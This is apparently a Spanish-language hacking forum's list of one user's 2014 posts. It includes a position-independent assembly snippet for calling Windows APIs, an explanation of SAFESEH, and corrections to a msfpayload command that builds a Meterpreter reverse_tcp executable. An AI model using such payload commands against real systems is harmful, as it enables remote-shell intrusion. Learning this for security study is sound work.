Menú

Mostrar Mensajes

Esta sección te permite ver todos los mensajes escritos por este usuario. Ten en cuenta que sólo puedes ver los mensajes escritos en zonas a las que tienes acceso en este momento.

Mostrar Mensajes Menú

Mensajes - MCKSys Argentina

#3431
Otra cosa que puedes hacer (para no usar el deltaoffset) es:

Código (asm) [Seleccionar]

.386
.model flat,stdcall
option casemap:none
.code

inicio:   
call delta        ;provoca el PUSH de la direccion del string que sigue
db "User32.dll",0
delta:
mov eax,77272864h ;direccion de loadlibraryA varia
call eax   
push 0 
push 0   
push 0   
push 0       
mov eax,778eea71h ;//direccion de MessageBoxA    varia
call eax
retn
end inicio


Para solucionar el problema de las DLLs, sólo necesitas LoadLibrary y GetProcAddress. Luego, usando el método que haz puesto o el que te dejo aquí; haces LoadLibrary y GetProcAddress y ya tienes la direccion real de la API.

Hay múltiples ejemplos de llamadas a API con código pic en internet.

Saludos!
#3432
La veo salir, pero cuando no estoy logueado...
#3433
Hasta donde entiendo, cuando compilas con SAFESEH, el compilador crea una tabla con todos los SEH chains que has declarado en tu codigo.

Luego, si ocurre una excepcion que tenga SEH, el SO comprobara que la direccion del SEH Handler al momento de la excepcion, este en la tabla creada. Si no esta, entonces no ejecutara el SEH handler.

Esto previene los exploits que sobreescriben el SEH handler.

Saludos!

EDIT: La tabla que te menciono, esta en tu exe.
#3434
Foro Libre / Re: nuevo miembrp
21 Julio 2014, 07:34 AM
Hola!

Aqui tienes el post donde puedes presentarte.

Saludos! (y bienvenido al foro!)
#3435
Windows / Re: windows-metasploit-payload
20 Julio 2014, 22:54 PM
Cita de: elputaso123 en 20 Julio 2014, 22:49 PM
Creo qué no me has entendido amigo

Lo que quiero es generar ese payload desde la consola de metasploit que tengo instalado en windows,saludos

El comando del link anterior, te permite crear un ejecutable, desde la consola, ya sea en linux o windows.

La explicacion del articulo es muy simple...

Saludos!
#3436
Windows / Re: windows-metasploit-payload
20 Julio 2014, 22:32 PM
Fijate esto.

Saludos!
#3437
Windows / Re: windows-metasploit-payload
20 Julio 2014, 22:20 PM
Tu codigo:


msfpayload windows/meterpreter/reverse_tcp LHOST=XXXXX LPORT=XXXX > /ejemplo/lol.exe


como creo que deberia ser:


msfpayload windows/meterpreter/reverse_tcp LHOST=XXXXX LPORT=XXXX x > /ejemplo/lol.exe


Saludos!
#3438
Hola!

Esto ya se ha respondido antes. Probaste usando el buscador del foro?

Saludos!
#3439
Redes / Re: necesito ayuda sobre pinguear
17 Julio 2014, 01:10 AM
Hola!

Esto te puede ayudar.

Saludos!
#3440
Hola!

Deberias leer las reglas del foro antes de hacer posts como este.
Encontrarás un link a las mismas debajo, en mi firma.

Saludos!